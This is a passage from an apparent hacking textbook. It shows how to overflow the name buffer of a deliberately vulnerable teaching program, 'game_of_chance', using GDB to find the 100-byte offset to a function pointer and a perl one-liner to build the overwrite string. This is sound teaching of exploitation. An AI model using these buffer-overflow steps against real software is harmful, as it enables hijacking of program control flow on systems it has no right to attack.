158 0x300
7 - Quit
[Name: Jon Erickson]
[You have 60 credits] ->
[1]+ Stopped ./game_of_chance
reader@hacking:~/booksrc $You can temporarily suspend the current process by pressing CTRL-Z. At
this point, the last_game variable has been set to 1, so the next time 1 is
selected, the function pointer will simply be called without being changed.
Back at the shell, we figure out an appropriate overflow buffer, which can
be copied and pasted in as a name later. Recompiling the source with
debugging symbols and using GDB to run the program with a breakpoint
onmain() allows us to explore the memory. As the output below shows, the
name buffer is 100 bytes from the current_game pointer within the user
structure.reader@hacking:~/booksrc $ gcc -g game_of_chance.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) break main
Breakpoint 1 at 0x8048813: file game_of_chance.c, line 41.
(gdb) run
Starting program: /home/reader/booksrc/a.outBreakpoint 1, main () at game_of_chance.c:41
41 srand(time(0)); // Seed the randomizer with the current time.
(gdb) p player
$1 = {uid = 0, credits = 0, highscore = 0, name = '\0' <repeats 99 times>,
current_game = 0}
(gdb) x/x &player.name
0x804b66c <player+12>: 0x00000000
(gdb) x/x &player.current_game
0x804b6d0 <player+112>: 0x00000000
(gdb) p 0x804b6d0 - 0x804b66c
$2 = 100
(gdb) quit
The program is running. Exit anyway? (y or n) y
reader@hacking:~/booksrc $Using this information, we can generate a buffer to overflow the name
variable with. This can be copied and pasted into the interactive Game of
Chance program when it is resumed. To return to the suspended process,
just type fg, which is short for foreground.reader@hacking:~/booksrc $ perl -e 'print "A"x100. "BBBB". "\n"'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAABBBB
reader@hacking:~/booksrc $ fg
./game_of_chance
5Change user name